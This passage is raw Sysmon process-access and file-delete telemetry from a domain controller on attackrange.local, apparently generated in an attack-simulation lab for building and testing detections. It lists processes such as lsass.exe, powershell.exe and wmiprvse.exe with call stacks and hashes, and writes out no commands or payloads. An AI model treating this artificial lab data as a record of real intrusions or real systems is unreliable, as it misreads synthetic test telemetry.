16:52:52.997{05ADC7E1-229D-6039-0B00-00000000AD01}85210068C:\Windows\system32\lsass.exe{05ADC7E1-6D64-603E-82AA-00000000AD01}13276C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002237686Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.997{05ADC7E1-229D-6039-0B00-00000000AD01}85210068C:\Windows\system32\lsass.exe{05ADC7E1-6D64-603E-82AA-00000000AD01}13276C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002237685Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.997{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-5AE8-603E-EFA7-00000000AD01}7872C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002237684Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.997{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-5A8B-603E-E3A7-00000000AD01}11288C:\Program Files\Mozilla Firefox\firefox.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002237683Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.997{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-59D7-603E-CAA7-00000000AD01}15144C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002237682Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.997{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-59D7-603E-C9A7-00000000AD01}15528C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002237681Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.997{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-59C3-603E-C8A7-00000000AD01}15472C:\Windows\System32\rundll32.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002237680Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.997{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-59BE-603E-C3A7-00000000AD01}15012C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002237679Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.997{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-59B2-603E-BEA7-00000000AD01}16180C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002237678Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.997{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-649E-603D-AC86-00000000AD01}7952C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002237677Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.997{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-649E-603D-AB86-00000000AD01}5896C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002237676Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.997{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-4090-603D-F281-00000000AD01}2992C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002237675Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.997{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-4090-603D-F181-00000000AD01}1592C:\Windows\system32\cmd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002237674Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.997{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-FB2E-603C-9079-00000000AD01}4328C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002237673Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.997{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-FB27-603C-8779-00000000AD01}2272C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 23542300x80000000000000002237672Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.997{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5CCA1B764A31FB46B339AE7852C75000,SHA256=DB416531696A118E6140918DAB93399670C5E281694C3BF85CB9CCE66708EEEC,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000002237964Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:54.387{05ADC7E1-FB20-603C-5D79-00000000AD01}16523928C:\Windows\system32\conhost.exe{05ADC7E1-6D66-603E-8AAA-00000000AD01}15340C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002237963Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:54.387{05ADC7E1-229F-6039-0C00-00000000AD01}5888240C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002237962Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:54.387{05ADC7E1-229F-6039-0C00-00000000AD01}5888240C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002237961Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:54.387{05ADC7E1-229F-6039-0C00-00000000AD01}5888240C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002237960Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:54.387{05ADC7E1-229F-6039-0C00-00000000AD01}5888240C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002237959Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:54.387{05ADC7E1-229D-6039-0500-00000000AD01}636752C:\Windows\system32\csrss.exe{05ADC7E1-6D66-603E-8AAA-00000000AD01}15340C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000002237958Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:54.387{05ADC7E1-FB1F-603C-5979-00000000AD01}64843560C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{05ADC7E1-6D66-603E-8AAA-00000000AD01}15340C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program 